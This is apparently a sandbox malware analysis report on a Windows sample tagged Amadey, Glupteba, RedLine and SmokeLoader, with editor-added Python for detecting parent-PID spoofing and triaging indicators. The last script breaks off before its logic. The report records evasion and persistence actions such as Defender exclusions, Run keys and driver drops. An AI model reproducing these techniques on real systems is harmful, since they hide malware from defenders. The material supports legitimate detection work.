Malware Analysis Report

2025-08-10 17:38

Sample ID 230626-bdawnafd68
Target 12dc82a693eb598eb3aa521ffe54dc77.bin
SHA256 307c3e20e65556cfe4c2c0e0864a6b71fe0bb56cf8c3e1fc26890cf849925705
Tags
amadey fabookie gcleaner glupteba redline smokeloader 240623_rcn_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware stealer trojan upx xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

307c3e20e65556cfe4c2c0e0864a6b71fe0bb56cf8c3e1fc26890cf849925705

Threat Level: Known bad

The file 12dc82a693eb598eb3aa521ffe54dc77.bin was found to be: Known bad.

Malicious Activity Summary

amadey fabookie gcleaner glupteba redline smokeloader 240623_rcn_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware stealer trojan upx xmrig miner

Windows security bypass

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

RedLine

Amadey

GCleaner

Fabookie

xmrig

Modifies security service

Glupteba payload

Glupteba

Detect Fabookie payload

Modifies boot configuration data using bcdedit

XMRig Miner payload

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Checks computer location settings

Windows security modification

UPX packed file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Manipulates WinMonFS driver

Manipulates WinMon driver

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Modifies system certificate store

Detects videocard installed

Kills process with taskkill

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-26 01:01

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2023-06-26 01:01

Reported

2023-06-26 01:03

Platform

win7-20230621-en

Max time kernel

145s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload


Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload


Modifies security service

evasion
Description | Indicator | Process | Target
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 1928 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE
PID 1928 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE
PID 1928 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE
PID 1928 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE
PID 1928 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE
PID 476 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 476 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 476 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 476 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1464 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 476 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1464 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1464 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1464 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1464 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1588 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1588 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1588 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1588 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 1588 created 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2424 created 1276 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\Explorer.EXE
PID 2068 created 1276 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2068 created 1276 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2068 created 1276 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2068 created 1276 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2068 created 1276 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2104 created 1276 | N/A | C:\Program Files\Notepad\Chrome\updater.exe | C:\Windows\Explorer.EXE
PID 2068 created 1276 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE
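Each row above pairs the process that issued the create call (the Process column) with the process it named as the new child's parent (the Target column, Explorer.EXE in every row), which is what the signature name NtCreateUserProcessOtherParentProcess describes. The Python below is an added example, not part of the sandbox report: it parses those rows in the sandbox's raw export format and shows the host-side detection, which compares the PID that issued a process-start event with the parent recorded for the new process. REPORT_ROWS are copied from this report; the EVENTS telemetry sample is constructed by the editor, and the svchost.exe allowlist for UAC elevation is an assumption to tune per estate.

```python
"""Parent-PID spoofing as recorded by the NtCreateUserProcessOtherParentProcess rows.

Added example, not part of the sandbox report. REPORT_ROWS are copied from the
table above in the sandbox's raw export format. EVENTS is a constructed sample
of process-start telemetry modelled on the report's PIDs, and BENIGN_ISSUERS
is an editor assumption to tune per estate.
"""
import re
from collections import defaultdict

EXPLORER = r"C:\Windows\Explorer.EXE"
REPORT_ROWS = [
    r"PID 1928 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe C:\Windows\Explorer.EXE",
    r"PID 476 created 1276 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE",
    r"PID 2104 created 1276 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\Explorer.EXE",
    r"PID 2424 created 1276 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE",
    r"PID 2068 created 1276 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE",
]

# "PID <caller> created <parent>": the caller (Process column) started a child
# and, via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, named <parent> (Target column)
# as the child's parent instead of itself. Image paths may contain spaces, so
# the target is anchored on its "C:\" prefix at the end of the row.
ROW_RE = re.compile(
    r"^PID (?P<caller>\d+) created (?P<parent>\d+) N/A "
    r"(?P<caller_image>.+?) (?P<parent_image>C:\\.+)$"
)


def parse_rows(rows):
    parsed = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            raise ValueError("unparsed row: " + row)
        parsed.append({"caller": int(m["caller"]), "parent": int(m["parent"]),
                       "caller_image": m["caller_image"], "parent_image": m["parent_image"]})
    return parsed


def spoofed_parents(rows):
    """Map each borrowed parent to the set of images that hid behind it."""
    by_parent = defaultdict(set)
    for r in parse_rows(rows):
        by_parent[(r["parent"], r["parent_image"])].add(r["caller_image"])
    return dict(by_parent)


# Constructed telemetry (editor's sample, not sandbox data). In the
# Microsoft-Windows-Kernel-Process ProcessStart event the header PID is the
# process that issued the call, while the payload's ParentProcessID is the
# parent the new process will report; Sysmon event 1 only exposes the latter.
EVENTS = [
    {"new_pid": 1900, "issuer_pid": 1276, "issuer_image": EXPLORER, "parent_pid": 1276},
    {"new_pid": 2200, "issuer_pid": 1928,
     "issuer_image": r"C:\Users\Admin\AppData\Local\Temp\XandETC.exe", "parent_pid": 1276},
    {"new_pid": 2300, "issuer_pid": 820,
     "issuer_image": r"C:\Windows\System32\svchost.exe", "parent_pid": 1276},
]

# UAC elevation is performed by the AppInfo service (svchost.exe) on behalf of
# the requester, so issuer != parent is expected there (assumption; extend as needed).
BENIGN_ISSUERS = {r"c:\windows\system32\svchost.exe"}


def detect_ppid_spoofing(events):
    """Events whose issuing process is not the parent the child will report."""
    return [e for e in events
            if e["issuer_pid"] != e["parent_pid"]
            and e["issuer_image"].lower() not in BENIGN_ISSUERS]


if __name__ == "__main__":
    for (pid, image), callers in spoofed_parents(REPORT_ROWS).items():
        print(f"{image} (PID {pid}) was named as parent by {len(callers)} distinct images")
    for e in detect_ppid_spoofing(EVENTS):
        print(f"PPID spoofing: PID {e['issuer_pid']} ({e['issuer_image']}) "
              f"created PID {e['new_pid']} under PID {e['parent_pid']}")
```

The allowlist is deliberately an image path rather than a PID: the AppInfo host PID changes per boot, and a spoofing loader that sets svchost.exe as its parent still fails the check because it is the issuer, not the parent, that is compared against the list.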

Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A
File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aafg31.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
N/A | N/A | C:\Windows\rss\csrss.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Program Files\Notepad\Chrome\updater.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A
N/A | N/A | C:\Windows\windefender.exe | N/A
N/A | N/A | C:\Windows\windefender.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Windows\system32\taskeng.exe | N/A
N/A | N/A | C:\Windows\rss\csrss.exe | N/A
N/A | N/A | C:\Windows\system32\taskeng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A
N/A | N/A | C:\Windows\rss\csrss.exe | N/A
N/A | N/A | C:\Windows\rss\csrss.exe | N/A
N/A | N/A | C:\Windows\rss\csrss.exe | N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3419557010-3639509551-242374962-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3419557010-3639509551-242374962-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver

rootkit evasion
Description | Indicator | Process | Target
File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A

Manipulates WinMonFS driver

rootkit evasion
Description | Indicator | Process | Target
File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description | Indicator | Process | Target
File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A
File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A
File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A
File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A
File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Notepad\Chrome\updater.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
File created | C:\Windows\Logs\CBS\CbsPersist_20230626010155.cab | C:\Windows\system32\makecab.exe | N/A
File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A
File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A
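The registry and file rows in the tables above (the Defender exclusions, the csrss Run key, the wuauserv key deletions, the driver and hosts-file drops) are the indicators an analyst actually hunts on, but as the sandbox exports them (one space between columns, with spaces inside the fields) they need parsing before they can feed anything. The Python below is an added example, not part of the sandbox report: it recovers the columns, decodes the quoted registry data, and applies the editor's own triage heuristics. ROWS are copied from this report in the raw export format; SYSTEM_NAMES, USER_WRITABLE and the severity rules are assumptions, not sandbox logic.

```python
"""Structured triage of the report's signature rows.

Added example, not part of the sandbox output. ROWS are copied from this
report in the sandbox's raw export format (one space between columns, spaces
inside the fields); the heuristics below (SYSTEM_NAMES, USER_WRITABLE, the
severity rules) are the editor's assumptions, not sandbox logic.
"""
import json
import re

ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3419557010-3639509551-242374962-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\System32\reg.exe N/A',
    r'File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A',
    r'File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A',
    r'File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A',
    r'File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A',
    r'Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Windows\windefender.exe N/A',
]

# Column boundaries: the description comes from a fixed vocabulary, the process
# column starts with "C:\" (or is N/A) and the target column closes the row.
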